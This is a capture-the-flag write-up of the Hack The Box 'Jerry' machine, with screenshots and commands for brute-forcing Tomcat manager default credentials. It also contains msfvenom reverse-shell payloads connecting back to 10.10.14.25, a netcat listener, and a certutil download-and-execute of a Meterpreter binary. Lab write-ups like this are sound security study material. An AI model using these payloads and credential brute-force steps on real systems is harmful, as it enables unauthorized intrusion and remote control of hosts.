# Jerry HTB

## Enumeration

* we use nmap for enumeration:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-48ed32ef71dd7f98410bafa7bdcc35c3df0a1a08%2F8cddd3f669aa81aea34d8653a30213a4.png?alt=media)
* we found a default webpage (apache tomcat):![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-5ed5032249848577ca2cac2476aae941f1b1101b%2Fd02f2dc3192004cfd7585a724d0f1ef8.png?alt=media)

## Exploitation

* Using burpsuite we find that the password is base64 encoded:!\[\[2024-01-30\_17-04.png]
* We can use decoder to decode bas64 and we find that it is in a username:password format![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-ecfa97f6f66ce267050410eedb89a8bfb94912c4%2Fa5f1a7ba31b459cc5db0cb05c841e182.png?alt=media)
* To do brute forcing we need to convert to Base64:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-f6ea122409cb1a2ffc7d51f50a3e03b0ff4aa89d%2F4f60e926b816554f43443b0369c09eac.png?alt=media)
* To do this for all passwords we need a bash command `for cred in $(cat tomcat_passwds.txt); do echo -n $cred | base64 ; done` ' where tomcat\_passwds.txt has all default passwords
* Use burpsuite to bruteforce: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-8f03b5d12c6449fa78c48ab5960d52a17acae1ca%2Fe77a9f5d4675c83e9021b93490f5570e.png?alt=media)![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-c7287f40aa7b680d2f26bc9bbd1866f6f742a2c5%2F03e27f6b79e550cb04c3133bfb5c2bbf.png?alt=media)
* We found 2 matches: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-861e286d7090482b09a7c3bc24621c0564e563f7%2F4ead91fe8752623142e84e771e647cb0.png?alt=media)
* These are the passwords required:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-a5739f83c0d9ff932a3f9e6e9acf66506d593484%2Fc869f5d1258d6afb864ce672de57603f.png?alt=media)
* We create a msfvenom payload with `msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.25 LPORT=4444 -f war > reverse.war` then deploy using the previously found credentials.![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-afd3298e93c29e8094a2c0a73154ebbd8f4bb337%2F8b49fe36849bd475de6c2b24314a1b21.png?alt=media)
* listening on netcat using `nc -nlvp 4444` we get an root shell:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-3dae2b474ac96891559b7576a469d10436954636%2Fa2375e2e39e1be7e5fbd328004feeb6b.png?alt=media)

### Metasploit

* use `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.25 LPORT=4444 -f exe > meterpreter.exe` for creating the payload
* listen using exploit/multi/handler
* To upload the payload host a http server with `python -m SimpleHTTPServer 80` then use `certutil -urlcache -f http://10.10.14.25/Downloads/Jerry/meterpreter.exe c:\users\administrator\desktop\flags\meterpreter.exe` in the shell and execute the meterpreter.exe file.
* Then we get a meterpreter shell \`